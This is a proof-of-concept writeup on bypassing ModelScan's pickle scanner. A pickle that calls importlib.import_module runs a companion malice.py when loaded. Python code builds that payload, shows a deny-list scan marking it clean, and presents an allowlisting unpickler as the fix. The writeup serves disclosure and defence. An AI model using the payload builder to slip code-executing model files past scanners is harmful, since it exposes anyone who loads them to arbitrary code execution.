ModelScan PickleUnsafeOpScan Bypass PoC

Steps to Reproduce

# 1. Scan with ModelScan
modelscan -p model.bin
# Output: Issues: 0, Errors: 0, Skipped: 0

# 2. Load the model
python3 -c "import pickle; pickle.load(open('model.bin','rb'))"

# 3. Check for RCE
cat /tmp/modelscan_bypass.txt
# Output: MODELSCAN_IMPORTLIB_BYPASS_SUCCESS

Technical Details

ModelScan's PickleUnsafeOpScan decides whether a pickle is unsafe by comparing the module of every GLOBAL / STACK_GLOBAL reference against a hardcoded deny-list (unsafe_globals). importlib is not on that list, so a pickle whose REDUCE opcode calls importlib.import_module() is reported with "Issues: 0". This is the structural weakness of any deny-list pickle scanner: the pickle VM resolves an arbitrary module.attribute at load time, so the set of names that would have to be blocked is open-ended. The safe posture is an allowlist of globals enforced by the loader itself (a restricted Unpickler.find_class), or not loading pickle-format weights from untrusted sources at all.

When the pickle is deserialized, the REDUCE opcode invokes importlib.import_module('malice'). Python resolves that name against sys.path, which for `python3 -c` starts with the current directory, so the companion malice.py sitting next to model.bin is imported and its top-level code runs. Nothing in model.bin itself is executable; the payload only fires when malice.py is importable from the loading process, which is why the reproduction above is run from the directory holding both files.
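The mechanism described above as an added, runnable example (this is not ModelScan's code nor the PoC author's): build_bypass_pickle() produces a pickle equivalent to model.bin; referenced_globals() lists every global the pickle resolves without importing any of them; blocklist_verdict() shows how a module deny-list marks that payload clean, where BLOCKLIST_MODULES is an assumed stand-in and not ModelScan's actual unsafe_globals table; allowlist_verdict() and RestrictedUnpickler show the allowlist alternative refusing it. ALLOWED_GLOBALS is likewise an assumption sized for a plain-dict checkpoint; a real framework checkpoint would need its own rebuild helpers added.

```python
"""Added example: importlib-based pickle payload, a deny-list scan that misses
it, and an allowlisting unpickler that refuses it. Stand-in code, not
ModelScan's implementation."""
import importlib
import io
import pickle

# Assumed stand-in for a scanner's unsafe-module table. The exact contents
# are not ModelScan's; the relevant property is that importlib is absent.
BLOCKLIST_MODULES = {"os", "subprocess", "sys", "builtins", "socket", "shutil"}

# Assumed allowlist for a plain-dict checkpoint. Extend per framework.
ALLOWED_GLOBALS = {("collections", "OrderedDict"), ("builtins", "set")}


class _ImportModule:
    """Serialises to REDUCE(importlib.import_module, (module_name,))."""

    def __init__(self, module_name):
        self.module_name = module_name

    def __reduce__(self):
        return (importlib.import_module, (self.module_name,))


def build_bypass_pickle(module_name="malice"):
    """Payload equivalent to the page's model.bin: unpickling imports
    `module_name`, so a companion malice.py on sys.path runs at import."""
    return pickle.dumps(_ImportModule(module_name))


class _Stub:
    """Inert object handed back for every global while auditing, so REDUCE,
    NEWOBJ and BUILD complete without importing or calling anything real."""

    def __new__(cls, *args, **kwargs):
        return object.__new__(cls)

    def __setstate__(self, state):
        pass

    def __setitem__(self, key, value):
        pass

    def append(self, value):
        pass

    def extend(self, values):
        pass


class _AuditingUnpickler(pickle.Unpickler):
    def __init__(self, data):
        super().__init__(io.BytesIO(data))
        self.seen = []

    def find_class(self, module, name):
        # Single choke point for both GLOBAL and STACK_GLOBAL opcodes.
        self.seen.append((module, name))
        return _Stub


def referenced_globals(data):
    """(module, name) pairs the pickle resolves, in order, with no imports.
    If the stubs cannot satisfy a later opcode (or a persistent id is hit),
    whatever was recorded up to that point is still returned."""
    unpickler = _AuditingUnpickler(data)
    try:
        unpickler.load()
    except Exception:
        pass
    return unpickler.seen


def blocklist_verdict(data):
    """Deny-list scan: unsafe only if a referenced module is on the list.
    importlib is not, so the bypass payload comes back 'clean'."""
    hits = [m for m, _ in referenced_globals(data) if m in BLOCKLIST_MODULES]
    return "unsafe" if hits else "clean"


def allowlist_verdict(data):
    """Allowlist scan: unsafe if any referenced global is not explicitly allowed."""
    unknown = [(m, n) for m, n in referenced_globals(data) if (m, n) not in ALLOWED_GLOBALS]
    return "unsafe" if unknown else "clean"


class RestrictedUnpickler(pickle.Unpickler):
    """Loader that resolves only allowlisted globals; anything else aborts
    in find_class, before REDUCE can call it."""

    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refusing global {module}.{name}")


def safe_load(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


if __name__ == "__main__":
    payload = build_bypass_pickle()
    print("globals referenced:", referenced_globals(payload))
    print("deny-list verdict:", blocklist_verdict(payload))
    print("allowlist verdict:", allowlist_verdict(payload))
    try:
        safe_load(payload)
    except pickle.UnpicklingError as err:
        print("restricted loader:", err)
```

Running the script prints the deny-list verdict "clean" and the allowlist verdict "unsafe" for the same bytes, then the refusal message from RestrictedUnpickler. Do not feed the payload to stock pickle.loads in a directory containing a malice.py; that is the exact condition under which the page's PoC executes arbitrary code.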
